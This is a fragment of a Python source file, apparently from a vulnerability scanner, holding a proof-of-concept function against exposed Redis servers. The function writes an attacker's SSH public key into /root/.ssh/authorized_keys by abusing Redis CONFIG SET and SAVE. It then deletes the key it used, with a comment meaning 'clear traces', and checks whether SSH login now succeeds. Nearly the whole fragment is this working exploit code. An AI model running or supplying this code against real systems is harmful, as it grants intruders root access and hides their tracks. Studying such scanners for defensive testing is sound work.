(url)
| 27 | |
| 28 | |
| 29 | def poc(url): |
| 30 | url = host2IP(url) |
| 31 | ip = url.split(':')[0] |
| 32 | port = int(url.split(':')[-1]) if ':' in url else 6379 |
| 33 | try: |
| 34 | if not checkPortTcp(ip, 22): |
| 35 | return False |
| 36 | r = redis.Redis(host=ip, port=port, db=0) |
| 37 | if 'redis_version' in r.info(): |
| 38 | key = randomString(10) |
| 39 | r.set(key, '\n\n' + public_key + '\n\n') |
| 40 | r.config_set('dir', '/root/.ssh') |
| 41 | r.config_set('dbfilename', 'authorized_keys') |
| 42 | r.save() |
| 43 | r.delete(key) # 清除痕迹 |
| 44 | r.config_set('dir', '/tmp') |
| 45 | time.sleep(5) |
| 46 | if testConnect(ip, 22): |
| 47 | return True |
| 48 | except Exception: |
| 49 | return False |
| 50 | return False |
| 51 | |
| 52 | |
| 53 | def testConnect(ip, port=22): |
nothing calls this directly
no test coverage detected